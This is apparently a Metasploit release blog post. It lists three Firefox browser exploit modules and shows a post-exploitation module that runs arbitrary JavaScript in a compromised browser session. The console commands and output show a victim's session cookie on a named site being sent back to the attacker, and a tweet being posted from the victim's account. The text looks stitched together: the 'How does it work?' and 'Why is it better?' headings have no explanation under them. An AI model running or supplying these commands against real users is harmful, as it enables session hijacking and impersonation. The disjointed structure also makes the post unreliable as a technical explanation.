Those of you with a keen eye on metasploit-framework/master will notice the addition of three new payloads:
How does it work?
- exploit/multi/browser/firefox_svg_plugin (Firefox 17.* + Flash)
- exploit/multi/browser/firefox_proto_crmfrequest (Firefox 5-15.*)
- exploit/multi/browser/firefox_xpi_bootstrapped_addon (all versions)
Why is it better?
post/firefox/gather/xss. To use it, simply specify the URL you want to run under and specify a SCRIPT option. The SCRIPT will be eval()'d by the payload and any results will be printed:
msf> use post/firefox/gather/xss
msf> set SESSION 1
msf> set URL https://rapid7.com
msf> set SCRIPT "send(document.cookie);"
[+] id=f612814001be908ds79f
Or, with a slightly more advanced script which sends a tweet in the target browser:
msf> set URL https://twitter.com
msf> set SCRIPT "$('.tweet-box').find('.tweet-box').focus().text('Metasploit Courtesy Tweet').parents('form').find('.tweet-button button').click(); return 'sent';"
[+] sent
Note: You can use send to send back data, but you can only send once.
If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.